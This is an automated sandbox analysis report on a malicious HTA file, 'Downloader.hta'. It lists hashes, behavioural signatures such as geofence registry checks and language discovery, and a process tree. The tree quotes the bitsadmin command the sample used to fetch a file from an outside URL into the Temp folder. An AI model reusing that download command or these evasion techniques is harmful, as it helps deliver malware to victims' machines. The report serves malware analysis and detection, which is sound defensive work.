Analysis
-
max time kernel
131s -
max time network
205s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28-08-2024 15:13
Static task
static1
Behavioral task
behavioral1
Sample
Downloader.hta
Resource
win7-20240708-en
5 signatures
300 seconds
General
-
Target
Downloader.hta
-
Size
828B
-
MD5
05a34f1fc75cc308ee7dd8a6dc3e4076
-
SHA1
eda4d95a33dde083ede19f8d9d4099764fa1a326
-
SHA256
a536c510d65bb3cfd573a05e0107ab46f427f804431970ecb18c7f173a9ccafd
-
SHA512
f02ddc254688bd5a4e069203f34fdffbc3905dc446aaed3578fa6f574e955788cb5416ee15bfb5acab970249c6c7563a6ef903cac4189bcc937ac9072f6c4612
Malware Config
Signatures
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
mshta.exebitsadmin.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
mshta.exedescription pid process target process PID 3368 wrote to memory of 2984 3368 mshta.exe bitsadmin.exe PID 3368 wrote to memory of 2984 3368 mshta.exe bitsadmin.exe PID 3368 wrote to memory of 2984 3368 mshta.exe bitsadmin.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://go.enderman.ch/youtube C:\Users\Admin\AppData\Local\Temp\sex2⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2984